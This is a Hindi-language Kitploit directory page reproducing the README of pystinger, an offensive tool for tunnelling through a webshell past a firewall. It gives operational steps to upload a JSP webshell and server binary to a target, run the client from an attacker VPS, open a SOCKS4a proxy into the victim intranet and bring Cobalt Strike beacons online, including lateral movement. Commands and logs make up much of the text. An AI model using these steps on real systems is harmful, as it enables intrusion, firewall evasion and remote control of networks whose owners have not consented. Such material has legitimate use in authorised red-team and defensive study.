Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/funnywolf/pystinger
शोषण फ्रेमवर्कपेलोड जनरेशनआईडीएस/आईपीएस से बचनापार्श्व आंदोलनवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubfunnywolf/pystinger

pystinger

वेबशेल का उपयोग करके ट्रैफ़िक फ़ॉरवर्डिंग के लिए फ़ायरवॉल को बायपास करें

रिपॉजिटरी देखें
1.4k20454 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

pystinger

English | 简体中文

Pystinger वेबशेल के माध्यम से SOCK4 प्रॉक्सी और पोर्ट मैपिंग लागू करता है।

इसे सीधे metasploit-framework, viper, cobalt strike द्वारा सत्र ऑनलाइन करने के लिए उपयोग किया जा सकता है।

Pystinger python में विकसित किया गया है, और वर्तमान में तीन प्रॉक्सी स्क्रिप्ट का समर्थन करता है: php, jsp(x) और aspx।

उपयोग

मान लीजिए कि सर्वर का डोमेन नाम http://example.com :8080 है। सर्वर इंट्रानेट का आंतरिक IPAddress 192.168.3.11 है

SOCK4 प्रॉक्सी

  • proxy.jsp को लक्ष्य सर्वर पर अपलोड करें और सुनिश्चित करें कि http://example.com:8080/proxy.jsp तक पहुँचा जा सके, पेज UTF-8 लौटाता है
  • stinger_server.exe को लक्ष्य सर्वर पर अपलोड करें, AntSword में cmdstart D:/XXX/stinger_server.exe चलाकर pystinger-server प्रारंभ करें

सीधे D:/xxx/singer_server.exe न चलाएँ, इससे TCP कनेक्शन टूट जाएगा

  • अपने VPS पर ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 चलाएँ
  • आपको निम्नलिखित आउटपुट दिखाई देगा
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • अब आपने VPS पर 127.0.0.1:60000 पर example.com के इंट्रानेट के लिए एक socks4a प्रॉक्सी शुरू कर दिया है।
  • अब लक्ष्य सर्वर (example.com) के 127.0.0.1:60020 को VPS के 127.0.0.1:60020 पर मैप कर दिया गया है

एकल लक्ष्य के लिए cobaltstrike का beacon ऑनलाइन

  • proxy.jsp को लक्ष्य सर्वर पर अपलोड करें और सुनिश्चित करें कि http://example.com:8080/proxy.jsp तक पहुँचा जा सके, पेज UTF-8 लौटाता है
  • stinger_server.exe को लक्ष्य सर्वर पर अपलोड करें, AntSword में cmdstart D:/XXX/stinger_server.exe चलाकर pystinger-server प्रारंभ करें

सीधे D:/xxx/singer_server.exe न चलाएँ, इससे TCP कनेक्शन टूट जाएगा

  • अपने VPS पर ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 चलाएँ
  • आपको निम्नलिखित आउटपुट दिखाई देगा
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • cobaltstrike पर लिसनर जोड़ें, लिसनर पोर्ट 60020 (आउटपुट के RAT CONFIG में Handler/LISTEN पोर्ट) है, लिसनर पता 127.0.0.1 है
  • पेलोड जनरेट करें, लक्ष्य पर अपलोड करें और चलाएँ।

एकाधिक लक्ष्यों के लिए cobaltstrike का beacon ऑनलाइन

  • proxy.jsp को लक्ष्य सर्वर पर अपलोड करें और सुनिश्चित करें कि http://example.com:8080/proxy.jsp तक पहुँचा जा सके, पेज UTF-8 लौटाता है
  • stinger_server.exe को लक्ष्य सर्वर पर अपलोड करें, AntSword में cmdstart D:/XXX/stinger_server.exe 192.168.3.11 चलाकर pystinger-server प्रारंभ करें (192.168.3.11 लक्ष्य का इंट्रानेट IP पता है)

192.168.3.11 को 0.0.0.0 में बदला जा सकता है

  • अपने VPS पर ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 चलाएँ
  • आपको निम्नलिखित आउटपुट दिखाई देगा
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • cobaltstrike पर लिसनर जोड़ें, लिसनर पोर्ट 60020 (आउटपुट के RAT CONFIG में Handler/LISTEN पोर्ट) है, लिसनर पता 192.168.3.11 है
  • पेलोड जनरेट करें, लक्ष्य पर अपलोड करें और चलाएँ।
  • जब दूसरे होस्ट पर पार्श्व गति की जाए, तो आप पेलोड को 192.168.3.11:60020 पर इंगित कर सकते हैं ताकि beacon ऑनलाइन हो सके

कस्टम हेडर और प्रॉक्सी

  • यदि वेबशेल को कुकी या प्राधिकरण कॉन्फ़िगर करने की आवश्यकता है, तो अनुरोध हेडर को --header पैरामीटर के माध्यम से कॉन्फ़िगर किया जा सकता है --header "Authorization: XXXXXX,Cookie: XXXXX"

  • यदि वेबशेल को प्रॉक्सी के माध्यम से एक्सेस करने की आवश्यकता है, तो आप --proxy के माध्यम से प्रॉक्सी सेट कर सकते हैं --proxy "socks5:127.0.0.1:1081"

संबंधित उपकरण

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

परीक्षण किया गया

stinger_server\stinger_client

  • windows
  • linux

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

अपडेट लॉग

2.0 अपडेट समय: 2019-09-29

  • Socks4 प्रॉक्सी सेवा क्लाइंट में स्थानांतरित हो गई

2.1 अपडेट समय: 2020-01-07

  • cobaltstrike ऑनलाइन (पोर्ट मैपिंग) का समर्थन जोड़ा गया

यह विकास jetbrains के सॉफ्टवेयर द्वारा समर्थित है।
https://www.jetbrains.com/?from=pystinger

टूल डाउनलोड करें